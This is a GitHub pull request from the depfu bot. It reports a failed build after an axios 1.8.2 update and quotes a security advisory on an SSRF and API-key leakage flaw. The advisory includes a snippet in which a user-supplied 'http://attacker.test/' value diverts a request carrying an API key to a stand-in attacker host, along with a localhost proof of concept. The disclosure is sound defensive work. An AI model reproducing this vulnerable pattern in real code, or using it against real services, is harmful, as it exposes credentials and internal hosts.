Skip to content

🚨 [security] New version of axios (1.8.2) broke the build #333

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Closed
depfu wants to merge 1 commit into from
Closed

🚨 [security] New version of axios (1.8.2) broke the build #333

depfu wants to merge 1 commit into from

Conversation

@depfu
Copy link
Contributor

@depfu depfu bot commented Mar 8, 2025

We've tested your project with an updated dependency and the build failed.

This version is either within the version range you specified or you haven't specified a version/range. To be able to test your project with the new version, we've taken the liberty of pinning the version for this branch and pull request.

name version specification new version
axios ^1.7.7 1.8.2

Unfortunately, we encountered failing tests after pinning. This means that this new version is not compatible with your project and the test failure will potentially also happen on fresh installs.

If you have correctly specified a semantic versioning version range, you should probably also file an issue with the upstream project as they might have released an update that's breaking SemVer rules, which is not cool. (But then again, not all projects explicitly follow SemVer)

We've left the pull request open for you to investigate this issue. Please don't merge it as is, because, again, we've pinned the version of axios for this test run.

What changed?

✳️ axios (^1.7.7 → 1.8.2) · Repo · Changelog

Security Advisories 🚨

🚨 axios Requests Vulnerable To Possible SSRF and Credential Leakage via Absolute URL

Summary

A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery).
Reference: #6463

A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if ⁠baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.

Details

Consider the following code snippet:

import axios from "axios";

const internalAPIClient = axios.create({

baseURL: "http://example.test/api/v1/users/",

headers: {

"X-API-KEY": "1234567890",

},

});


// const userId = "123";

const userId = "http://attacker.test/";


await internalAPIClient.get(userId); // SSRF

In this example, the request is sent to http://attacker.test/ instead of the baseURL. As a result, the domain owner of attacker.test would receive the X-API-KEY included in the request headers.

It is recommended that:

  • When baseURL is set, passing an absolute URL such as http://attacker.test/ to get() should not ignore baseURL.
  • Before sending the HTTP request (after combining the baseURL with the user-provided parameter), axios should verify that the resulting URL still begins with the expected baseURL.

PoC

Follow the steps below to reproduce the issue:

  1. Set up two simple HTTP servers:
mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html 
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &
  1. Create a script (e.g., main.js):
import axios from "axios";
const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);
  1. Run the script:
$ node main.js
this is server2

Even though baseURL is set to http://localhost:10001/, axios sends the request to http://localhost:10002/.

Impact

  • Credential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.
  • SSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.
  • Affected Users: Software that uses baseURL and does not validate path parameters is affected by this issue.
Release Notes

1.8.2

Release notes:

Bug Fixes

  • http-adapter: add allowAbsoluteUrls to path building (#6810) (fb8eec2)

Contributors to this release

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 4 commits:

@depfu depfu bot added the depfu label Mar 8, 2025
@depfu depfu bot mentioned this pull request Mar 8, 2025
Closed
@depfu
Copy link
Contributor Author

depfu bot commented Mar 13, 2025

Closed in favor of #334.

@depfu depfu bot closed this Mar 13, 2025
@depfu depfu bot deleted the depfu/check/npm/axios-1.8.2 branch March 13, 2025 09:46
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

depfu

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant